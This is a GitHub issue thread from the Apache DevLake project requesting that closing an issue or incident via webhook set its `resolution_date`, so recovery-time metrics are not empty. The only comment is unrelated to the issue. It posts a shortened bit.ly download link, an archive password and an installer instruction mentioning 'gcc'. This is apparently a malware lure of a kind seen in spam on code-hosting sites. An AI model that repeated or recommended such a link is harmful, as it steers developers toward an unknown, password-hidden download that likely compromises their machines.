### ISSUE TITLE
[Feature][Webhook] When closing an issue, update the `resolution_date` with the current timestamp

### ISSUE THREAD

**Issue by Startrekzky** [apache/devlake#7970]
### Search before asking

- [X] I had searched in the [issues](https://github.com/apache/incubator-devlake/issues?q=is%3Aissue) and found no similar feature requirement.

### Use case

Some users report that `incidents` pushed from webhook have no `resolution_date`, which led to an empty `Failed Deployment Recovery Time`. 

### Description

The `resolutionDate`is and should be empty when [Registering Issues - Update or Create Issues](https://devlake.apache.org/docs/Plugins/webhook/#register-issues---update-or-create-issues) . However, when closing an issue/incident, the `resolutionDate` should be compulsory.

#### To Do

- [ ] Update the `resolutionDate` when closing issues
- [ ] Update the description in the [webhook doc](https://devlake.apache.org/docs/Plugins/webhook/#register-issues---close-issues-optional)

### Are you willing to submit a PR?

- [ ] Yes I am willing to submit a PR!

### Code of Conduct

- [X] I agree to follow this project's [Code of Conduct](https://www.apache.org/foundation/policies/conduct)

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."
